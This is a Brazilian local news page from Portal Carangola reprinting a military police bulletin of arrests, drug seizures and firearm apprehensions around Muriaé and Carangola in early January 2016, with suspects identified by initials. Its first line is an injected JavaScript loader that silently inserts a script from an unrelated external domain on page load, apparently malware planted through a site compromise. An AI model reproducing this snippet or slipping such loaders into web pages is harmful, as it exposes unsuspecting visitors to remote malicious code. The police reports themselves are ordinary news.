;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 04/01/16. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 04/01/16.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 04/01/2016

76ª CIA PM – MURIAÉ
PM APREENDE DROGAS EM EUGENÓPOLIS

Em 30/12/2015, por volta das 08h00min, na Avenida Antenor Mazorque, no centro da cidade, em cumprimento ao mandado de busca e apreensão na residência de C.A.M.S., de 51 anos, militares lograram êxito em localizar 03 barras e meia de maconha, 06 buchas da mesma substância, aproximadamente 2 kg de um pó branco sem identificação e ainda materiais utilizados na prática de rinha de galo. Os materiais foram apreendidos, porém o autor não foi localizado.

PM APREENDE MENOR POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 01/01/2016, por volta das 01h30min, na Rua Mutirão, no Bairro São Joaquim, durante patrulhamento, militares depararam com J.A.S., de 16 anos que, ao avistar a viatura policial, tentou evadir, sendo perseguido e abordado, localizando em sua cintura 01 revólver cal.32 municiado com 03 cartuchos intactos. Diante dos fatos, o menor foi apreendido juntamente com a arma e conduzido à Delegacia de Polícia.

PM EFETUA PRISÃO DE FORAGIDO DA JUSTIÇA EM MURIAÉ

Em 01/01/2016, por volta das 19h57min, na Rua Israel Pinheiro de Lacerda, no Bairro Santana, militares abordaram um veículo conduzido por I.C.M., de 44 anos, o qual inicialmente forneceu nome falso. Durante parlamentação, este admitiu ter fugido do sistema prisional há cerca de seis anos na cidade de Ervália/MG. Durante consulta ao sistema informatizado, foi constatado mandado de prisão em aberto, motivo pelo qual o autor preso e conduzido à Delegacia de Polícia.

PM EFETUA PRISÃO DE FORAGIDO DA JUSTIÇA EM MURIAÉ

Em 01/01/2016, por volta das 22h35min, na Rua Maria Cândida do Carmo, no Bairro Santana, militares receberam denúncia sobre um foragido da justiça. Em deslocamento, lograram êxito em localizar C.A.S.B., de 26 anos, o qual possuía em seu desfavor um mandado de prisão em aberto. Diante dos fatos, o autor foi preso e conduzido à Delegacia de Polícia.

PM PRENDE AUTORES POR TRÁFICO DE DROGAS EM LARANJAL

Em 01/01/2016, por volta das 03h30min, na Rua Firmo Dias de Oliveira Neto, no centro da cidade, militares abordaram alguns indivíduos em atitude suspeita, porém nada de ilícito foi localizado. Questionados, relataram que aguardavam um táxi, sendo posteriormente abordado e, ao proceder buscas em algumas bolsas no interior do veículo, lograram êxito em localizar 27 invólucros de droga, 01 porção grande de cocaína, 01 pedra grande de crack, R$ 23,00, dentre outros objetos. Os autores W.S.D., de 21 anos, J.C.D.S., de 31 anos e P.C.S., de 19 anos foram presos juntamente com o taxista C.R.B., de 56 anos e conduzidos à Delegacia de Polícia.

PM APREENDE MENOR POR TRÁFICO DE DROGAS EM MURIAÉ

Em 02/01/2016, por volta das 19h30min, na Rua Manoel Correa Prado, no Bairro Aeroporto, durante patrulhamento, militares abordaram S.A.S.S., de 16 anos, e após busca pessoal, constataram que este trazia em sua boca 01 invólucro contendo 05 papelotes de cocaína e que também havia dispensado 01 bucha de maconha. Recebendo denúncias de que o autor utiliza uma residência próxima ao local da abordagem para acondicionar/preparar entorpecentes, militares foram ao local, uma residência desabitada, e localizaram 173 papelotes de cocaína, 53 buchas de maconha e 01 faca. Diante dos fatos, o menor e os materiais foram apreendidos e conduzidos à Delegacia de Polícia.

PM APREENDE MENOR POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 03/01/2016, por volta das 13h00min, na Rua Valdomiro Inácio Rodrigues, no Bairro Aeroporto, durante rastreamento a procura de autores de roubo, militares depararam com um indivíduo que empreendeu fuga, sendo perseguido a pé, momento em que o suspeito sacou uma arma de fogo, apontando em direção a eles. O suspeito não acatou a ordem para abaixar a arma, momento em que dois militares efetuaram um disparo de arma de fogo. Em seguida, conseguiram capturar o suspeito, tratando-se de R.S.M.M., de 16 anos, de posse de 01 revólver cal.22 com 04 cartuchos de “festim”. Diante dos fatos, o menor e a arma foram apreendidos e encaminhados à Delegacia de Polícia.

PM EFETUA PRISÃO POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 03/01/2015, por volta das 23h50min, na Rua Manoel Clemente Pereira, no Bairro São José, durante patrulhamento, militares abordaram U.M.P., de 22 anos e, durante busca pessoal, localizaram em sua cintura 01 revólver cal.38 com 06 munições intactas. Diante dos fatos, o autor foi preso e conduzido para a Delegacia de Plantão.
75ª CIA PM – CARANGOLA
PM EFETUA PRISÃO POR TRÁFICO DE DROGAS EM FERVEDOURO

Em 31/12/2015, por volta das 16h30min, na Av. Maria Amélia de Souza Pedrosa, no centro da cidade, durante Operação Policial, militares abordaram H.L.S.N., de 17 anos, localizando em seu poder 01 pedra de crack. Questionado, o menor apontou onde havia comprado a droga, momento em que deslocaram à residência de R.S.V., de 21 anos, o qual foi surpreendido com 13 pedras de crack. No interior da residência, encontrava-se R.M.F.G., de 16 anos, amásia do proprietário da residência, a qual tentou impedir a ação policial, sendo apreendida. Ainda no interior da residência, foram recolhidos R$ 449,00 em moeda corrente e 02 aparelhos de celular. Autores presos/apreendidos e materiais recolhidos e entregues na Delegacia de Plantão.
ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.